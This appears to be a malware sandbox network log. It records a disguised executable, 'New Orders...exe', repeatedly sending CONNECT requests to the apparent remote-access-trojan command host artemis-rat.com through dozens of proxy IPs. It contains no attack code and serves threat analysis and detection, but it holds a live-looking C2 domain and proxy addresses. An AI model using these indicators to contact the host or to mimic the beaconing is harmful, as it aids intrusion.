                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        953192.168.2.95275061.92.189.15807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.386936903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        954192.168.2.95303641.86.252.914437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.387032986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        955192.168.2.95304041.86.252.914437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.388890982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        956192.168.2.952928162.159.242.62807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.389077902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.549853086 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        957192.168.2.95304141.86.252.914437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.390775919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        958192.168.2.952778203.74.125.1888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.392616987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        959192.168.2.95304241.86.252.914437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.393151045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        960192.168.2.95170320.78.102.191807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.399471998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439068079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539057016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561222076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:01.384274006 CET806INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:18:01 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        961192.168.2.95275851.75.125.208481147672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.407083988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.070103884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.070239067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976859093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.773765087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570394039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        962192.168.2.952706123.110.158.236807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.412446022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        963192.168.2.952781128.140.26.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.412446976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.721369982 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.25.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        964192.168.2.950363128.199.196.31271027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.412800074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.476450920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.570710897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.570573092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.679536104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.773367882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.773356915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.773228884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:43.773173094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        965192.168.2.951619105.214.65.24456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.412801027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        966192.168.2.95271093.157.248.108887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.413336992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        967192.168.2.95273431.134.151.40807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.413819075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        968192.168.2.9528985.161.103.113807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.418257952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.636732101 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        969192.168.2.952753192.162.232.1510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.425287008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        970192.168.2.951764188.132.221.16380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.440062046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.476455927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.220205069 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        971192.168.2.95286752.151.210.20490027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.440110922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.070100069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        972192.168.2.95172275.119.145.169615537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.440840960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.538691044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        973192.168.2.95176239.109.113.9731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.441212893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439100981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539082050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.320554972 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.16.1
                                                                                        Date: Mon, 11 Mar 2024 14:55:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        974192.168.2.952884162.223.94.164807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.441673040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
